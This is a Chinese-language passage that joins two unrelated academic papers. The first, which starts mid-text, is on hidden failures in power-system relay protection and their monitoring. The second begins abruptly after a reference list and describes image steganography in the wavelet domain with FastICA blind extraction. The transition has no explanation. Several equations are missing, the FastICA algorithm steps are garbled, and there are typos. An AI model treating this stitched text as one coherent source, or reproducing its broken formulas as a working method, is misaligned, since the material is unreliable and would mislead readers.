由于继电保护的隐藏故障在电力系统正常运行的情况下是不会表现不来的,而只有在系统运行状态不正常的时候还会显现,也就是说,继电保护隐藏故障只有在系统运行的时候才会显露出来,所以,检测继电保护的隐藏故障采用传统的离线检测方式是不适合的。由此可见,对继电保护隐藏故障的监测需要的是在线监控系统,可是目前并没有专门的监控系统对继电保护隐藏故障进行保护,而只能依靠微机保护中的自检功能来保证系统的安全运行。早在1996年,一些国际著名的保护权威专家就指出致使电网发生联锁故障的最主要原因之一就是保护装置与系统中的隐藏故障,并进行了详细的研究,针对继电保护隐藏故障提出了监测和控制的技术方案。该系统主要是为了对电网中存在高脆弱性指数的保护装置进行监测与控制,系统首先会对输入继电器内部的信号进行分析诊断,事实上就是对该保护的算法与功能进行复制,最后将系统的输出结果和处于运行中的继电保护装置的输出结果进行相应的逻辑关系的对比分析,两者的输出结果若是相同,那么就会允许执行保护跳闸命令;而若是两者的输出结果不同,那么跳闸命令就会被禁止执行,这时,该系统就相当于起到了闭锁的作用。但是从二十世纪九十年代至今,微机保护装置自身的软、硬件技术和变电站的综合自动化成为了继电保护技术与变电站自动化发展中的重点,而对继电保护隐藏故障的监测与控制方面的研究却处于停滞状态。从而也就形成了目前仍然是采用微机保护的自检功能来确保系统的安全运行的现状。
3 继电保护隐藏故障的风险
从对继电保护隐藏故障的分析中我们就能看出,继电保护隐藏故障和常规故障之间的区别就在于隐藏故障不会立刻引发系统故障,而是要在系统处于不正常运行的情况下才会出现,这也是继电保护隐藏故障最危险的一点。继电保护隐藏故障的发生机制主要是在电力系统故障时或是故障后瞬间的非正常状态之下,但是初次之外,电力系统中的任何一个元件都可能出现隐藏故障。相关资料表明,电网中出现大规模的扰动事件有四分之三都和继电保护中的隐藏故障有关,而它们也存在着一个显著的特点就是:所存在的缺陷与隐患是不能被检测出来的,只有在相邻的事故发生后才会表现出来,并使事故进一步恶化。
继电保护隐藏故障发生的位置不同,其对电力系统所造成的危害程度也不相同,其主要是取决于隐藏故障的发生位置。为了对隐藏故障的风险进行评估,有的学者就提出了应用风险理论建立隐藏故障的风险评估的方案。继电保护隐藏故障风险评估的基本思想就是利用隐藏故障的概率,根据系统的拓扑结构对建立的连锁故障的模型进行仿真计算,其主要是对继电保护中所有隐藏的故障均进行风险评估,然后根据评估结果找出电力系统的薄弱环节,并采取相应的预防措施。
4继电保护隐藏故障监测方法
由继电保护隐藏故障的定义可知,继电保护装置的隐藏故障在正常运行时并不表现出来,而在系统出现压力的情况下才显现,也就是说隐藏故障只会在系统运行中暴露出来,因此,传统的离线式检测方法并不适合用来监测隐藏故障,必须研究针对继电保护装置隐藏故障的在线监测系统。目前尚无专门的监控系统用以检测运行中的继电保护系统是否存在隐藏故障,而是仅依靠微机保护中一些简单的自检功能来保障保护系统的运行。不管是保护系统的定期计划检修还是保护装置自检功能,都属于离线式的检测方法,均没有考虑装置现场运行中的情况,因此,这些目
前广泛采用的离线检测方式都不是可以信赖的检测方案,无法实现对于继电保护隐藏故障的检测。
目前广泛采用的常规检测方法往往是在保护装置离线情况下进行的,由于隐藏故障是在运行过程中才爆发,因此传统的检测方法并不能对隐藏故障进行全面的检测。考虑到隐藏故障存在的特点,完善的检测方法应做到对保护装置进行在线监测,这样才能够在系统暴露出隐藏故障时,及时发现其中的错误动作倾向,对存在隐藏故障的保护装置进行动作闭锁或者使其退出运行,阻止由于保护装置的隐藏故障而造成保护误动作的行为。
对隐藏故障而言,当系统在正常运行的时候,该故障一般不会表现出来;但是,当系统工作不正常时,往往暗示存在其中的隐藏故障已经达到了承受极限。当系统运行状况超过这个极限,保护装置就会出现误动或拒动的错误行为,因此,保护装置的状态经历了一个从正常到故障的动态过程
结论
继电保护的隐藏故障对电力系统的影响是非常大的,而且在电力系统正常运行的情况下,隐藏故障是不能被发现的。因此,隐藏故障的监测不仅重要而且是存在着一定难度的。在很早之前有研究者提出了隐藏故障的监测与控制系统,但是在其后的电力自动化的研究中重点研究的则是微机保护自身的软、硬件技术以及变电站的自动化技术,在隐藏故障的监测与控制方面的研究一直处于停滞状态。近年来,继电保护的隐藏故障的监测与控制的研究也逐渐的发展起来。
参考文献
[1]曾丽柳.继电保护隐藏故障监测及风险分析方法研究[J].科技风,2012(13).
中图分类号: TP309.2
文献标识码:A
0引言
随着信息安全技术的不断发展和丰富,信息隐藏技术作为信息安全中的一项重要技术,近十年来引起了国内外学术界和相关部门的重视。隐写术作为信息隐藏技术中最为重要的两个分支之一,近年来受到了广泛的关注。隐写术(Steganography)这个词语本身的意思是“掩饰性地写”,通常被解释为将秘密信息隐藏在其他信息中。它以图像、音频等数字媒体作为掩护,把要发送的秘密消息嵌入到载体信号内部,以不引起外界注意的方式通过公共信道,特别是互联网进行传递。它与水印同属信息隐藏范畴,有许多共性但也存在着差异,如通信内容不同:水印的通信内容是宿主信号本身,而隐写的通信内容是被隐蔽的消息;鲁棒性要求不同:水印必须高度鲁棒,而隐写则不要求很强的鲁棒性,因为它通常应用于无扰信道等等。
图像隐写包括嵌入算法和提取算法两个部分,简单地说嵌入算法就是将载体图像与秘密图像进行混合,而提取算法则是让载体图像与秘密图像分离,使得秘密信息尽可能完整地从混合图像中提出。提取秘密信息以往惯用的方法就是将提取算法作为嵌入算法的逆算法,怎么嵌入秘密信息就怎么用逆方法进行提取;或者是使用原始载体图片来得到秘密信息。本文考虑到独立分量分析(ICA)是一种将信号分解成若干个互相独立成分的信号处理方法,它能够有效地将混合信号进行分离,所以将其引入了提取算法中。
目前,已有一些研究人员将独立分量分析引入了信息隐藏领域,但大多存在于数字水印方面,用于隐写术的文章很少。目前,将ICA引入数字水印的文章主要分为两类,第一类是在水印嵌入时就将ICA引入了,而非单纯地用于提取[1]。第二类则仅在水印检测、提取时使用ICA,如文献[2,3]就是将载体图像和水印线性变换后得到的数据作为第一条观测信号,再利用原始图像的信息组成第二条或第三条观测信息,进行ICA提取。同样的方法也在文献[4]中出现了,只不过该论文将第二条观测信号进行了加密。这些文章在提取时基本上都使用了原载体图片信息,没有实现真正意义上的盲提取,这在使用中受到一定的限制,而且存在无法说明被提取水印来源的问题。文献[5,6]则提出将原始图像和水印图像在嵌入前就进行混合,取其中一条混合信号进行嵌入操作,另一条作为密钥,提取时利用这两条混合信号进行ICA。虽然此方法未用到载体图像的信息,但需要另外负载一大串的密钥以便进行提取。
基于隐写术与水印的不同点,本文提出一种专适用于隐写术的ICA提取算法。对于嵌入算法,可引用其他文章提出的嵌入方法,无须做任何特别的更改,我们所需做的仅仅是进行两次嵌入操作而已;对于提取算法,快速ICA(FastICA)被引入了进来,提取过程中无需载体图片的信息,仅仅需要提取密钥(阈值)即可提取秘密信息,方便简单,实现了秘密信息的真正盲提取。
1独立分量分析
独立分量分析是信号处理领域在20世纪90年代后期发展起来的一项全新的信号处理和数据分析方法。顾名思义,它的含义是把信号分解成若干个互相独立的成分。图1是ICA最简单的框图说明。多导观察X是多个信源S经混合矩阵A组合而成(X=AS)。现在的任务是:在S与A均为未知的条件下,求取一个解混矩阵B,使得X通过它后所得输出Y(Y=BX)是S的最优逼迫。独立分量分析实际上是一个优化问题,因为问题没有唯一解,只能在某一衡量独立性的判据最优的意义下寻求其近似解答,使Y中各分量尽可能相互独立;Y与S不但只是近似,而且在排列次序和幅度上都允许不同。
1.1ICA的数学模型
ICA问题的混合―解混过程如图2所示,其中解混系统B就是ICA过程。
假设混叠系统有m个传感器和n个源信号,源信号与观察信号之间的关系如下:
其中观察信号X(t)=[x1(t),x2(t),…,xm(t)]T是m个未知的源信号的混叠,而且n个源信号是相互统计独立的。混叠矩阵是一个m×n阶的矩阵。
盲源分离就是求解矩阵B,使得通过下面的公式可以恢复得到源信号S(t):
在没有关于混叠矩阵A和源信号S(t)的任何先验信息的情况下该问题是没有解的。因此通常认为:(1)源信号si(t),i=1,2,…,n是平稳的随机信号,且是相互统计独立的;(2)A是满秩的,一般设m=n;(3)至多一个源信号为高斯的。这样利用源信号统计独立的假设,可以恢复出源信号[5]。
目前,对于分离矩阵B的求解方法很多,本文选用 Aapo Hyvarinen等人提出的“快速ICA算法”(FastICA,FICA)来进行提取。
1.2快速ICA算法
1997年芬兰学者Aapo Hyvarinen等人首先提出基于四阶累计量的固定点算法。其后,在1999年又提出了进一步的改进――基于负熵的ICA固定点算法。在2001年出版的著作中他们又作了进一步简化。由于这一算法比批处理甚至自适应处理,具有更快的收敛速度,因此又被称为”快速ICA算法”。
多个独立分量逐次提取的FastICA算法步骤如下[7]:
(1) 把原始数据x去均值,再球化,得z;
(2) 设m为待提取独立分量的数目,令p=1;
(3) 任意取up(0),但要求up(0)2=1;
(4) 迭代:
(5) 正交化:up(k+1)-∑p-1j=1[up(k+1),uj]ujup(k+1)
(6) 归一化: ui(k+1)ui(k+1)2ui(k+1)
(7) 如up未收敛,回到步骤(4);
(8) 令p加1,如p≤m,则回到步骤(3)。否则工作完成;
注意:式中k是迭代序号,不是时间序号。E(•)可以通过对z的各采样时刻值求均值来估计。
2基于FastICA的隐写提取算法
为确保ICA模型的可识别性,要求线性混合的观测信号数目至少等于或大于独立源的数目。对于本文的提取算法,需要进行两个独立分量的提取,所以至少要求有两个观测信号,而在仅有隐藏图像,无载体图像的情况下,只能得到一个观测信号。为得到两条观测信号,我们实施了两次嵌入算法。所以本文选用真彩色图像作为载体对象。原因是:1) 由于真彩色图像具有红、绿、蓝三个分量矩阵,我们可以分别在各颜色分量上进行嵌入。考虑到人眼对颜色的敏感程度,我们选择在红色和蓝色分量上分别进行一次嵌入。 2) 真彩色图片很普遍,如从数码相机中,从网络上都很容易得到。嵌入算法与提取算法构成了隐写的整体,两者联系紧密,为了使提取算法容易理解,作为提取算法的铺垫,我们须介绍嵌入算法。
2.1嵌入算法
在本论文里,我们将希望被秘密保存的信息称为嵌入对象,将用于隐蔽嵌入对象的非保密载体称为掩体对象。嵌入对象通过嵌入过程被隐藏在称为掩体对象的非保密信息中,从而生成隐藏对象。下面是具体的嵌入步骤:
1) 由于本文考虑的隐写是在频域嵌入法中的小波系数上进行的,所以首先对嵌入对象进行小波分解,得到小波系数矩阵V。
2) 对掩体对象的红色矩阵进行小波分解,得到系数矩阵M。由嵌入人员取定一个阈值(作为提取密钥)。将大于阈值的系数存于矩阵W中,这些系数在M中的坐标存于数组S中,将V中的系数与W中的系数相加,根据S修改M中的原系数值。再对系数矩阵M进行小波重构,即可得到隐藏对象的红色矩阵。再将V中的系数与W中的系数进行线形变换,即
这里我们取α=0.1,β=0.2,可得到系数矩阵P。
3) 对掩体对象的蓝色矩阵进行小波分解,得到系数矩阵N。根据数组S,用P中的值依次替换N中的原始系数。即可得到加载了秘密信息的另一副小波系数。对系数矩阵N进行小波重构,嵌入算法完成。
2.2提取算法
隐写与水印一个很大的不同在于:水印的载体信息在水印提取后仍然具有商业价值,而隐写术中的载体信息扮演的唯一角色是掩盖通信的存在,掩体对象的内容对发送者和接收者来说没有价值[8],所以在提取时完全可以将掩体对象当作噪声来剔除掉,因此在提取算法中我们只注重嵌入对象的系数,ICA中所需要的观测信号的长度只需跟嵌入对象的系数长度一样就行了。具体的提取算法步骤如下:
(1) 对隐藏对象的红色矩阵进行小波分解,得到系数矩阵C。将大于密钥阈值的系数存于一维数组A中作为第一条观测信号,将这些系数在C中的坐标存于数组S中。
(2) 对隐藏对象的蓝色矩阵进行小波分解,得到系数矩阵W。依据数组S,从W中寻找出相应的系数值,存入一维数组B中作为第二条观测信号。
(3) 用(1)中的数组A和(2)中的数组B组成两条观测信号,应用FastICA进行分离,可得到掩体对象的部分小波系数和嵌入对象的全体系数,进行小波重构,可得嵌入对象。
3实验
这一节我们将对FastICA的提取效果进行验证,选择下面两幅图作为掩体对象和嵌入对象,见图3。
图3中掩体对象与嵌入对象的小波系数图如图4,对隐藏对象进行FastICA后得到的掩体对象和嵌入对象的小波系数图如图5所示。
结论:
(1) 从图4和图5可以看出,图4中的嵌入对象系数图与图5中的嵌入对象系数图形状上非常相似,几乎一模一样,不同的地方在于图5中的那幅图幅值范围要小得多,只位于-1~3之间,而图4中的幅值位于0~200之间,这都是FastICA预处理球化造成的结果。我们可以通过调整幅值的范围,将两幅图更加的接近,以进行提取。
(2) 从图4和5还可以看出,嵌入对象的小波系数图在两幅图中出现的位置是不同的,这正好说明了ICA提取的顺序不确定性,这也是为什么我们要进行两次提取的原因。因为不能够确定进行一次提取后提取出来的是嵌入对象的系数。